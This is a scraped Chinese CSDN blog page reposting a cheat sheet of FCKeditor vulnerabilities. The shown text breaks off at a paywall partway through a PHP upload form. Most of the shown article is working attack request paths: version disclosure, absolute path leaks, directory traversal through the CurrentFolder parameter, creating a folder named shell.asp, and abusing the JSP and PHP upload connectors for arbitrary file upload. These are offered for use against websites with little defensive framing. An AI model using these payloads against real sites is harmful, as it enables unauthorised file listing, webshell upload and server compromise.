Fckeditor漏洞整理集合

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量1k 收藏 1
点赞数 1
文章标签: php shell javascript ViewUI
原文链接:http://www.cnblogs.com/bl8ck/p/9521448.html
版权
本文详细列举了Fckeditor的各种漏洞,包括查看编辑器版本、爆绝对路径、遍历目录、JSP上传、PHP上传漏洞、文件名绕过、创建文件夹等,并提供了相关利用方式和示例,揭示了Fckeditor在不同版本中存在的一系列安全隐患。
摘要由CSDN通过智能技术生成

1、查看编辑器版本

/fckeditor/editor/dialog/fck_about.html

2、爆绝对路径

FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)

/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx 2.5可突破

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

3、遍历目录

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录:

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

4、jsp上传

/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

[PHP]

<form id="frmUpload" enctype="multipart/form-data"action="

最低0.47元/天 解锁文章
E4857632
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fckeditor 漏洞最新整理.
09-05
Fckeditor 漏洞最新整理. 网络 安全 web出防攻
FCK
learnmore的实验田
09-23 509
FCK编辑器使用手册 FckEditor配置手册中文教程详细说明 性能 首先,FCKEDITOR的性能是非常好的,用户只需很少的时间就可以载入FCKEDITOR所需文件.对于其他在线编辑器来说,这几乎是个很难解决的难题,因为在开启编辑器时需要装载太多的文件.比如CUTEEDITOR,虽然功能比FCKEDITOR还要强大,可是,它本身也够庞大了,至于FREETEXTBOX等,其易用性与FC...
XSStrike工具的安装及使用(包括实战应用),网络安全开发新手入门教程
2401_84185182的博客
04-10 372
实战测试发现一个登录页面 用户名输入什么都显示正确,怀疑此处有注入点。放到xsstrike跑因为是post请求所以用测试post请求的命令成功拿下,使用任意payload,开始验证这时候还要普及一个xss漏洞,因为这个网站刚好有!
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 753
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
php爆网站 绝对路径小结 - cracer_CSDN
m0_67888657的博客
07-12 316
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。解决方法其实也很简单,既然我们不能减慢目标网站的速度,那我们就想办法减慢自己的速度,这样达到的效果是一样的。也很简单,只要我们找一个速度极慢的代理,挂上以后再上目标网站,就有可能将绝对路径爆出来。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。将要提交的参数值改成错误值,比如-1。
应用安全-软件安全-漏洞CVE整理
weixin_30865427的博客
07-01 1439
jira ssrf CVE-2019-8451 url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/' ImageMagick RCE CVE-2016-3714 axis2 弱口令 任意文件读取 Awstats 路径泄露 h...
fckeditor php版 漏洞,Fckeditor漏洞总结及利用方法(未成功)
weixin_34837898的博客
03-22 1478
先在这里做一个Fckeditor知识的了解:FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找第一:查看编辑器版本其相关默认路径如:FCKeditor/_whatsnew.htmlFCKeditor/editor/dialog/fck_about.htmlFCKeditor/_samp...
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
FCKeditor漏洞
05-28
### FCKeditor漏洞详解 #### 引言 FCKeditor是一款广泛使用的富文本编辑器,因其功能强大且易于集成,深受开发者的喜爱。然而,正如许多开源软件一样,FCKeditor也存在一定的安全风险,尤其是关于文件上传和路径...
FCKeditor 新闻组件的一些程序漏洞
10-30
很多网站可能都在用FCK的新闻编辑组件,使用FCK的时候一定要注意版本是否安全,以下是FCK中的文件上传漏洞:(主要是:connector.aspx文件的漏洞
fckeditor漏洞测试工具
09-30
fckeditor漏洞测试工具,填写域名即可
node-aspell-spellchecker:php的节点替换需要jquery-spellchecker的Web服务
05-09
节点拼写检查器 php的节点替换需要jquery-spellchecker的Web服务 要求: 咒语 节点v0.10.x jquery-spellchecker( ) 快递v3.2.x 如何安装: npm install node-aspell-spellchecker 如何使用: 替换拼写检查实例化路径: var spellchecker = new $.SpellChecker('textarea', { lang: 'en', parser: 'text', webservice: { path: '../../webservices/php/SpellChecker.php', driver: 'pspell' }, suggestBox: { position: 'above' }, incorrectWords: {
ecshop /includes/lib_base.php、/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server...
weixin_34315665的博客
05-23 160
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 ECShop是国内一款流行的网店管理系统软件,其2.7.3版本某个补丁存在后门文件,攻击者利用后门可以控制网站 Relevant Link: http://sebug.net/vuldb/ssvid-62379   ...
java fckeditor下载_fckeditor-java-d
weixin_28848739的博客
02-21 169
META-INF/META-INF/MANIFEST.MFjsp/fckeditor/fckeditor/editor/fckeditor/editor/_source/fckeditor/editor/_source/commandclasses/fckeditor/editor/_source/internals/fckeditor/editor/_source/classes/fckedit...
spellchecker.php 漏洞,CVE-2013-3630 Moodle Spellcheck 远程命令执行漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_32586767的博客
04-13 667
### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require 'rexml/document'class Metasploit4 < Msf...
FCKEditor
weixin_34405925的博客
07-23 1010
1. 首先将FCKEditor文件夹复制到项目WebRoot下 2.将fckeditor-java-core-2.4.1.jar,commons-fileupload-1.2.1.jar,  commons-io-1.3.2.jar,slf4j-api-1.5.2.jar以及slf4j-simple-1.5.2.jar 复制到WEB-INF/lib下 3.fckconfig.js FCK...
php中关于fckeditor的详细配置
weixin_34233679的博客
03-25 130
因为下载下来的压缩包里面有包含很多在我们使用时,用不到的,不删除也行。看个人喜好下面以PHP为例,进行程序瘦身 删除所有”_”开头的文件和文件夹 删除FCKeditor的目录下: fckeditor.afp fckeditor.asp fckeditor.cfc fckeditor.cfm fckeditor.lasso fckeditor.pl fckeditor....
web渗透【11】phpmyadmin写shell的三种方法
司徒荆的博客
05-30 5926
查看phpMyAdmin能否自定义导出文件目录的权限
spellchecker.php 漏洞,整理一些大汉版通的漏洞
weixin_39990819的博客
04-13 2356
1.sql注入/vc/vc/interface/index/que_scount.jsp?webid=1/jcms/short_message/que_contact.jsp?vc_searchname=1/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a/jcms/workflow/design/que_model.j...
fckeditor 漏洞
04-28
然而,FCKeditor也已经被证实存在一些漏洞,这些漏洞可能导致用户数据泄露、系统被攻击等问题。 一种有名的FCKeditor漏洞是文件上传漏洞。攻击者可以在上传过程中注入恶意代码,使其能够运行在服务端上,从而导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值